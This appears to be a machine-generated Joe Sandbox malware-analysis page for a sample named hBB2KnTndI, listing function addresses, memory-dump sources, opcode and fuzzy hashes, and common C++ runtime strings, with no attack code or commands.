Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 4faf5ff1bf83171ac02ea2252ff168ecd2d57c4a6d4c2177f361016a51eccb91
Instruction ID: fbdb4b2a3b731f556a8aaa0250c5d08bd5e1d5bde183a0cb6e18c7be085082a8
Opcode Fuzzy Hash: 4faf5ff1bf83171ac02ea2252ff168ecd2d57c4a6d4c2177f361016a51eccb91
Instruction Fuzzy Hash: B6E12A72A446258FC704CF28C8D23D9BBE2AF81354F19827ADD599B342C37EAD859784

Uniqueness

Uniqueness Score: -1.00%

Function 00468160 Relevance: 3.3, Strings: 2, Instructions: 844COMMON

Download Yara Rule

Strings

-, xrefs: 00468E0D
,5O, xrefs: 00468781

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID: ,5O$-
API String ID: 0-3390524069
Opcode ID: 9c55081f505dce213f40bdc2d6cfd4752ee05600ac5b367c7ab2ca8f77f21ae4
Instruction ID: 7aa50590b6b60e0b5102c0e4054bb15c1c56594df38895d1129a96c41e8fc607
Opcode Fuzzy Hash: 9c55081f505dce213f40bdc2d6cfd4752ee05600ac5b367c7ab2ca8f77f21ae4
Instruction Fuzzy Hash: 19728070A002498FCF14DF68C4946AEBBB1BF05304F14865EE8459B391EB79ED86CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 004D8C88 Relevance: 2.9, APIs: 1, Instructions: 1354COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 004D8E03

Memory Dump Source

Source File: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 02deb92841897436473f05212dc81b3230664060b9f6c4d1982e33aafa4d7425
Instruction ID: 81ae2921413551c6780df07f151ddf98c591d603772396c3ea9858ced9f50d0e
Opcode Fuzzy Hash: 02deb92841897436473f05212dc81b3230664060b9f6c4d1982e33aafa4d7425
Instruction Fuzzy Hash: 3FC22771E086288FDB65CE28DD907AAB3B5EB49304F1441EBD84DE7340E779AE818F45

Uniqueness

Uniqueness Score: -1.00%

Function 0046C6B0 Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

basic_string::replace, xrefs: 0046C708, 0046C76F
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 0046C710, 0046C777

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 39653677-3564965661
Opcode ID: 98d90f136d8c2fbffc8c0995f8cff5cfc170e1d2466c14e78482567e818835e1
Instruction ID: cb248e44f19215fcb5b55666c6c24c7f36c2b39e633ba6ad804b0ea9ba2e9767
Opcode Fuzzy Hash: 98d90f136d8c2fbffc8c0995f8cff5cfc170e1d2466c14e78482567e818835e1
Instruction Fuzzy Hash: 112115B4A09344AF8340EF29C58482BFBE5EBC8794F50D96EF8C883314E734A8418F56

Uniqueness

Uniqueness Score: -1.00%

Function 0049EB72 Relevance: 2.6, Strings: 2, Instructions: 64COMMON

Download Yara Rule

Strings

I, xrefs: 0049EBBC
POSIX, xrefs: 0049EBD6

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID: I$POSIX
API String ID: 0-1843915188
Opcode ID: be88e9bdc943cb8d99e9a85d9e7bdcf5ef16146069bbd27517f6f5f38fbb1abc
Instruction ID: a4d5e2545b73faef2a660282a0ad41483f657ffa8fa614fcb76a30b8d7d90a99
Opcode Fuzzy Hash: be88e9bdc943cb8d99e9a85d9e7bdcf5ef16146069bbd27517f6f5f38fbb1abc
Instruction Fuzzy Hash: B8119DB2A042089BDB00AF65D5453AFFFB4FB85354F02C42EED485B341C339995ACB96

Uniqueness

Uniqueness Score: -1.00%

Function 0044D5E0 Relevance: 2.0, APIs: 1, Instructions: 758COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ccbdc2dedd47a5e706c14cdc7a82ba7a6e2203ce021791e58cee7087b6189b0
Instruction ID: 279f37d5e98e3b3100b0887a9ad025be400c80965c68a51f3984c725bc95f9e4
Opcode Fuzzy Hash: 6ccbdc2dedd47a5e706c14cdc7a82ba7a6e2203ce021791e58cee7087b6189b0
Instruction Fuzzy Hash: 57628F70E04298CFEB24DF68C4907AEBBB1AF05314F28865AE4659F392C379DD46CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0044CA70 Relevance: 2.0, APIs: 1, Instructions: 754COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 0044CC44

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: 8a665aed61ae976c2acebd75b8dcd649f65a3df04d4867947e290664dfbf92d6
Instruction ID: 5124d889975178a784303149c88be9825ff62088f2774f10e24a1f375c09493f
Opcode Fuzzy Hash: 8a665aed61ae976c2acebd75b8dcd649f65a3df04d4867947e290664dfbf92d6
Instruction Fuzzy Hash: E4629070E052988FEB54CFA8C0D07AEBBB1BF05314F28825AE8559B392C379DD46CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0044AA40 Relevance: 2.0, APIs: 1, Instructions: 712COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 0044AD2A

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: ad7993ae4f221ba1e8f5d51b8bb6652938dd233b8da8ac38adf0741580a8338f
Instruction ID: 03b8307fe8af6d2a61eeb92bb0f58712459c97fdbfd6d170774622f70c4e75d0
Opcode Fuzzy Hash: ad7993ae4f221ba1e8f5d51b8bb6652938dd233b8da8ac38adf0741580a8338f
Instruction Fuzzy Hash: 8362A4709442988FEB14CF68C4947AEBBB1BF05314F28825AE8659F381C379DD57CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00449F90 Relevance: 2.0, APIs: 1, Instructions: 705COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 0044A26A

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: 0577d69c564a9d5b96204350ad41838468f9726bae25c4b6eb213814c9ff01ca
Instruction ID: 774013577510cc5f2c76ddcbb1ef0eb607f7427a6d170da15bbeee5e02ecf9ab
Opcode Fuzzy Hash: 0577d69c564a9d5b96204350ad41838468f9726bae25c4b6eb213814c9ff01ca
Instruction Fuzzy Hash: 3C52B0709442588FEB20CF68C0847AEBBB1BF05324F19869AE8659F391C379DC57CB46

Uniqueness

Uniqueness Score: -1.00%

Function 004503C0 Relevance: 1.9, APIs: 1, Instructions: 655COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 00450781

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: cb3006130dd7e42829b3004c7781e953fbcfabaffa84905ba73f428958262f31
Instruction ID: 1ba113455a6184096ce4f163dff43d9cd119ffa28e56368a80b2356c992e06a0
Opcode Fuzzy Hash: cb3006130dd7e42829b3004c7781e953fbcfabaffa84905ba73f428958262f31
Instruction Fuzzy Hash: 0152CF74904298DFDF14DFA8C4907AEBFB1BF45315F18825AE8959B383C339984ACB85

Uniqueness

Uniqueness Score: -1.00%

Function 00450DA0 Relevance: 1.9, APIs: 1, Instructions: 616COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 932f4df7d875ea87f96b42b5f2e1f251c747a301549347b0b98f8a37d2927dd0
Instruction ID: 04be347c0bc77b74ee9c6bfd662ac8d9fedf8c20f832471cb33afc6a5a84e868
Opcode Fuzzy Hash: 932f4df7d875ea87f96b42b5f2e1f251c747a301549347b0b98f8a37d2927dd0
Instruction Fuzzy Hash: 9F42F270D042989FCF24CFA8C0907AEBBB1AF05315F14819BEC919B3A3C378994ACB45

Uniqueness

Uniqueness Score: -1.00%

Function 0044EA00 Relevance: 1.8, APIs: 1, Instructions: 570COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 0044ED3B

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: cd02168774b80e216d03531530df5556a2d137873f953791506afa7696a0e30b
Instruction ID: 8d61fd680a6d616762daf76c83deb9a5d7614011ad3166526c2faa6a08ff5e78
Opcode Fuzzy Hash: cd02168774b80e216d03531530df5556a2d137873f953791506afa7696a0e30b
Instruction Fuzzy Hash: 9132AD70904299DFEF10CFA9D0807AEBFB1BF05314F14455BE895AB382C379A94ACB55

Uniqueness

Uniqueness Score: -1.00%

Function 0043DFF0 Relevance: 1.6, APIs: 1, Instructions: 340stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0043E33E

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: d566590d37779bca265cc2a5a866327b1f82eae64eea281ff3e62f8c7e20948d
Instruction ID: 23d6ad602170c6406652ede0ae7e0a25ff090e72a8c70e63711af2ad627e5684
Opcode Fuzzy Hash: d566590d37779bca265cc2a5a866327b1f82eae64eea281ff3e62f8c7e20948d
Instruction Fuzzy Hash: E2E15E71901119CFCF14CF6AC4806AEBBB1AF4D324F18925AE825AB391D339ED42CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004416C0 Relevance: 1.6, APIs: 1, Instructions: 339COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00441A09

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: wcslen
String ID:
API String ID: 4088430540-0
Opcode ID: 6d7cff8f5e94c84ad2be04c7832b32ef5c4dd08bb1094c1bf3d22c5f523c3663
Instruction ID: a0474b2f58dc4b78011c3f87e853268e819ec89b4132a75c8a53623d6a2d0f02
Opcode Fuzzy Hash: 6d7cff8f5e94c84ad2be04c7832b32ef5c4dd08bb1094c1bf3d22c5f523c3663
Instruction Fuzzy Hash: 9BD15D75A002198BDF20DF69C4805EEB7F1FF48314F64815AE855AB360E739ED82CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004CD137 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 004CD2B3

Memory Dump Source

Source File: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 205f5db79ebd84f74a6d79e044b196edb6aed300a4d25be2936dbd0686ccffae
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 0D517A7CE0064866DBF89A698896FBF679AAB02304F0C057FD842D7391CE1DDD46821F

Uniqueness

Uniqueness Score: -1.00%

Function 0049A9C0 Relevance: 1.5, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

basic_string::_M_replace, xrefs: 0049ACA0

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID: basic_string::_M_replace
API String ID: 0-2323331477
Opcode ID: 42e15e87170c5060c3382461a1ada10b42e0dbe0ed25fbee402e72022a2fee0c
Instruction ID: 052374d8f981a4ccada7bec4deddc09578f4b44ff1d9c943b912c08537c57289
Opcode Fuzzy Hash: 42e15e87170c5060c3382461a1ada10b42e0dbe0ed25fbee402e72022a2fee0c
Instruction Fuzzy Hash: 6B810875A083129FCB10DF29C18042EBBF2AFC5740F55882EE5859B324E739E855DB9B

Uniqueness

Uniqueness Score: -1.00%

Function 004951B0 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

locale::_Impl::_M_replace_facet, xrefs: 004951F0

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID:
String ID: locale::_Impl::_M_replace_facet
API String ID: 0-4011348548
Opcode ID: 51657b7d528928f0517e6913bc70dd46d63278dbc5ef3a0bfe3e40cd889a828b
Instruction ID: 534f4fc89b604a2d35cf3642f93f9e639b70b8edfd06593965c6681881eabbb6
Opcode Fuzzy Hash: 51657b7d528928f0517e6913bc70dd46d63278dbc5ef3a0bfe3e40cd889a828b
Instruction Fuzzy Hash: E0F0FF32A043018BDB00AF15C88196BF7F5FBC9708F15496EE88427302DB78BC05CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00430520 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

basic_string::at: __n (which is %zu) >= this->size() (which is %zu), xrefs: 00430540

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
